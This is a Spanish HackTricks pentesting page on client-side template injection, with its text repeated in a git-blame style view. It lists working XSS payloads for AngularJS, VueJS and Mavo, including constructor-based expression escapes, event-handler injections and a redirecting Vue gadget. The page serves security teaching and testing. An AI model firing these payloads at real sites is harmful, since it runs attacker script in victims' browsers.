hacktricks/pentesting-web/client-side-template-injection-csti.md

# Inyección de Plantillas del Lado del Cliente (CSTI)

{% hint style="success" %}
Aprende y practica Hacking en AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Aprende y practica Hacking en GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Apoya a HackTricks</summary>

* Revisa los [**planes de suscripción**](https://github.com/sponsors/carlospolop)!
* **Únete al** 💬 [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **síguenos** en **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Comparte trucos de hacking enviando PRs a los** [**HackTricks**](https://github.com/carlospolop/hacktricks) y [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos de github.

</details>
{% endhint %}


## Resumen

Es como una [**Inyección de Plantillas del Lado del Servidor**](ssti-server-side-template-injection/) pero en el **cliente**. La **SSTI** puede permitirte **ejecutar código** en el servidor remoto, la **CSTI** podría permitirte **ejecutar código JavaScript arbitrario** en el navegador de la víctima.

**Probar** esta vulnerabilidad es muy **similar** al caso de **SSTI**, el intérprete espera **una plantilla** y la ejecutará. Por ejemplo, con una carga útil como `{{ 7-7 }}`, si la aplicación es **vulnerable** verás un `0`, y si no, verás el original: `{{ 7-7 }}`

## AngularJS

AngularJS es un marco de JavaScript ampliamente utilizado que interactúa con HTML a través de atributos conocidos como directivas, una notable es **`ng-app`**. Esta directiva permite que AngularJS procese el contenido HTML, habilitando la ejecución de expresiones JavaScript dentro de llaves dobles.

En escenarios donde la entrada del usuario se inserta dinámicamente en el cuerpo HTML etiquetado con `ng-app`, es posible ejecutar código JavaScript arbitrario. Esto se puede lograr aprovechando la sintaxis de AngularJS dentro de la entrada. A continuación se presentan ejemplos que demuestran cómo se puede ejecutar código JavaScript:
```javascript
{{$on.constructor('alert(1)')()}}
{{constructor.constructor('alert(1)')()}}
<input ng-focus=$event.view.alert('XSS')>

<!-- Google Research - AngularJS -->
<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>
```
Puedes encontrar un **ejemplo básico en línea** de la vulnerabilidad en **AngularJS** en [http://jsfiddle.net/2zs2yv7o/](http://jsfiddle.net/2zs2yv7o/) y en [**Burp Suite Academy**](https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-angularjs-expression)

{% hint style="danger" %}
[**Angular 1.6 eliminó el sandbox**](http://blog.angularjs.org/2016/09/angular-16-expression-sandbox-removal.html) así que a partir de esta versión, una carga útil como `{{constructor.constructor('alert(1)')()}}` o `<input ng-focus=$event.view.alert('XSS')>` debería funcionar.
{% endhint %}

## VueJS

Puedes encontrar una **implementación vulnerable de Vue** en [https://vue-client-side-template-injection-example.azu.now.sh/](https://vue-client-side-template-injection-example.azu.now.sh)\
Carga útil funcional: [`https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor(%27alert(%22foo%22)%27)()%7D%`](https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor\(%27alert\(%22foo%22\)%27\)\(\)%7D%7D)

Y el **código fuente** del ejemplo vulnerable aquí: [https://github.com/azu/vue-client-side-template-injection-example](https://github.com/azu/vue-client-side-template-injection-example)
```markup
<!-- Google Research - Vue.js-->
"><div v-html="''.constructor.constructor('d=document;d.location.hash.match(\'x1\') ? `` : d.location=`//localhost/mH`')()"> aaa</div>
```
Un muy buen artículo sobre CSTI en VUE se puede encontrar en [https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets](https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets)

### **V3**
```
{{_openBlock.constructor('alert(1)')()}}
```
Crédito: [Gareth Heyes, Lewis Ardern & PwnFunction](https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets)

### **V2**
```
{{constructor.constructor('alert(1)')()}}
```
Crédito: [Mario Heiderich](https://twitter.com/cure53berlin)

**Consulta más cargas útiles de VUE en** [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected)

## Mavo

Carga útil:
```
[7*7]
[(1,alert)(1)]
<div mv-expressions="{{ }}">{{top.alert(1)}}</div>
[self.alert(1)]
javascript:alert(1)%252f%252f..%252fcss-images
[Omglol mod 1 mod self.alert (1) andlol]
[''=''or self.alert(lol)]
<a data-mv-if='1 or self.alert(1)'>test</a>
<div data-mv-expressions="lolx lolx">lolxself.alert('lol')lolx</div>
<a href=[javascript&':alert(1)']>test</a>
[self.alert(1)mod1]
```
**Más cargas útiles en** [**https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations**](https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations)

## **Lista de Detección de Fuerza Bruta**

{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %}


{% hint style="success" %}
Aprende y practica Hacking en AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Aprende y practica Hacking en GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Apoya a HackTricks</summary>

* Revisa los [**planes de suscripción**](https://github.com/sponsors/carlospolop)!
* **Únete al** 💬 [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **síguenos** en **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Comparte trucos de hacking enviando PRs a los** [**HackTricks**](https://github.com/carlospolop/hacktricks) y [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositorios de github.

</details>
{% endhint %}
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:02:14 +00:00			`# Inyección de Plantillas del Lado del Cliente (CSTI)`
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 21:58:36 +00:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:02:14 +00:00			`{% hint style="success" %}`
			`Aprende y practica Hacking en AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Aprende y practica Hacking en GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`
f 2023-06-05 20:33:24 +02:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:02:14 +00:00			`<details>`
f 2023-06-05 20:33:24 +02:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:02:14 +00:00			`<summary>Apoya a HackTricks</summary>`
f 2023-06-05 20:33:24 +02:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:02:14 +00:00			`* Revisa los [planes de suscripción](https://github.com/sponsors/carlospolop)!`
			`* Únete al 💬 [grupo de Discord](https://discord.gg/hRep4RUj7f) o al [grupo de telegram](https://t.me/peass) o síguenos en Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Comparte trucos de hacking enviando PRs a los [HackTricks](https://github.com/carlospolop/hacktricks) y [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) repos de github.`
f 2023-06-05 20:33:24 +02:00
			`</details>`
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:02:14 +00:00			`{% endhint %}`
f 2023-06-05 20:33:24 +02:00

Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 21:58:36 +00:00			`## Resumen`
f 2023-06-05 20:33:24 +02:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:02:14 +00:00			`Es como una [Inyección de Plantillas del Lado del Servidor](ssti-server-side-template-injection/) pero en el cliente. La SSTI puede permitirte ejecutar código en el servidor remoto, la CSTI podría permitirte ejecutar código JavaScript arbitrario en el navegador de la víctima.`
f 2023-06-05 20:33:24 +02:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:02:14 +00:00			Probar esta vulnerabilidad es muy similar al caso de SSTI, el intérprete espera una plantilla y la ejecutará. Por ejemplo, con una carga útil como `{{ 7-7 }}`, si la aplicación es vulnerable verás un `0`, y si no, verás el original: `{{ 7-7 }}`
f 2023-06-05 20:33:24 +02:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 21:58:36 +00:00			`## AngularJS`
f 2023-06-05 20:33:24 +02:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:02:14 +00:00			AngularJS es un marco de JavaScript ampliamente utilizado que interactúa con HTML a través de atributos conocidos como directivas, una notable es `ng-app`. Esta directiva permite que AngularJS procese el contenido HTML, habilitando la ejecución de expresiones JavaScript dentro de llaves dobles.
f 2023-06-05 20:33:24 +02:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:02:14 +00:00			En escenarios donde la entrada del usuario se inserta dinámicamente en el cuerpo HTML etiquetado con `ng-app`, es posible ejecutar código JavaScript arbitrario. Esto se puede lograr aprovechando la sintaxis de AngularJS dentro de la entrada. A continuación se presentan ejemplos que demuestran cómo se puede ejecutar código JavaScript:
f 2023-06-05 20:33:24 +02:00			```javascript
			`{{$on.constructor('alert(1)')()}}`
			`{{constructor.constructor('alert(1)')()}}`
			`<input ng-focus=$event.view.alert('XSS')>`

			`<!-- Google Research - AngularJS -->`
			`<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>`
			```
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:02:14 +00:00			`Puedes encontrar un ejemplo básico en línea de la vulnerabilidad en AngularJS en [http://jsfiddle.net/2zs2yv7o/](http://jsfiddle.net/2zs2yv7o/) y en [Burp Suite Academy](https://portswigger.net/web-security/cross-site-scripting/dom-based/lab-angularjs-expression)`
f 2023-06-05 20:33:24 +02:00
			`{% hint style="danger" %}`
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:02:14 +00:00			[Angular 1.6 eliminó el sandbox](http://blog.angularjs.org/2016/09/angular-16-expression-sandbox-removal.html) así que a partir de esta versión, una carga útil como `{{constructor.constructor('alert(1)')()}}` o `<input ng-focus=$event.view.alert('XSS')>` debería funcionar.
f 2023-06-05 20:33:24 +02:00			`{% endhint %}`

Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 21:58:36 +00:00			`## VueJS`
f 2023-06-05 20:33:24 +02:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:02:14 +00:00			`Puedes encontrar una implementación vulnerable de Vue en [https://vue-client-side-template-injection-example.azu.now.sh/](https://vue-client-side-template-injection-example.azu.now.sh)\`
			Carga útil funcional: [`https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor(%27alert(%22foo%22)%27)()%7D%`](https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor\(%27alert\(%22foo%22\)%27\)\(\)%7D%7D)
f 2023-06-05 20:33:24 +02:00
			`Y el código fuente del ejemplo vulnerable aquí: [https://github.com/azu/vue-client-side-template-injection-example](https://github.com/azu/vue-client-side-template-injection-example)`
			```markup
			`<!-- Google Research - Vue.js-->`
			"><div v-html="''.constructor.constructor('d=document;d.location.hash.match(\'x1\') ? `` : d.location=`//localhost/mH`')()"> aaa</div>
			```
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:02:14 +00:00			`Un muy buen artículo sobre CSTI en VUE se puede encontrar en [https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets](https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets)`
f 2023-06-05 20:33:24 +02:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 21:58:36 +00:00			`### V3`
f 2023-06-05 20:33:24 +02:00			```
			`{{_openBlock.constructor('alert(1)')()}}`
			```
Translated ['forensics/basic-forensic-methodology/pcap-inspection/wiresh 2024-02-06 04:06:30 +00:00			`Crédito: [Gareth Heyes, Lewis Ardern & PwnFunction](https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets)`
f 2023-06-05 20:33:24 +02:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 21:58:36 +00:00			`### V2`
f 2023-06-05 20:33:24 +02:00			```
			`{{constructor.constructor('alert(1)')()}}`
			```
			`Crédito: [Mario Heiderich](https://twitter.com/cure53berlin)`

Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:02:14 +00:00			`Consulta más cargas útiles de VUE en [https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected)`
f 2023-06-05 20:33:24 +02:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 21:58:36 +00:00			`## Mavo`
f 2023-06-05 20:33:24 +02:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:02:14 +00:00			`Carga útil:`
f 2023-06-05 20:33:24 +02:00			```
			`[7*7]`
			`[(1,alert)(1)]`
			`<div mv-expressions="{{ }}">{{top.alert(1)}}</div>`
			`[self.alert(1)]`
			`javascript:alert(1)%252f%252f..%252fcss-images`
			`[Omglol mod 1 mod self.alert (1) andlol]`
			`[''=''or self.alert(lol)]`
			`<a data-mv-if='1 or self.alert(1)'>test</a>`
			`<div data-mv-expressions="lolx lolx">lolxself.alert('lol')lolx</div>`
			`<a href=[javascript&':alert(1)']>test</a>`
			`[self.alert(1)mod1]`
			```
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:02:14 +00:00			`Más cargas útiles en [https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations](https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations)`
f 2023-06-05 20:33:24 +02:00
Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2 2024-05-05 21:58:36 +00:00			`## Lista de Detección de Fuerza Bruta`
f 2023-06-05 20:33:24 +02:00
			`{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %}`

Translated ['crypto-and-stego/hash-length-extension-attack.md', 'forensi 2024-04-18 03:34:07 +00:00
f 2023-06-05 20:33:24 +02:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:02:14 +00:00			`{% hint style="success" %}`
			`Aprende y practica Hacking en AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Aprende y practica Hacking en GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`
f 2023-06-05 20:33:24 +02:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:02:14 +00:00			`<details>`
f 2023-06-05 20:33:24 +02:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:02:14 +00:00			`<summary>Apoya a HackTricks</summary>`
f 2023-06-05 20:33:24 +02:00
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:02:14 +00:00			`* Revisa los [planes de suscripción](https://github.com/sponsors/carlospolop)!`
			`* Únete al 💬 [grupo de Discord](https://discord.gg/hRep4RUj7f) o al [grupo de telegram](https://t.me/peass) o síguenos en Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Comparte trucos de hacking enviando PRs a los [HackTricks](https://github.com/carlospolop/hacktricks) y [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) repositorios de github.`
f 2023-06-05 20:33:24 +02:00
			`</details>`
Translated ['pentesting-web/browser-extension-pentesting-methodology/REA 2024-07-19 16:02:14 +00:00			`{% endhint %}`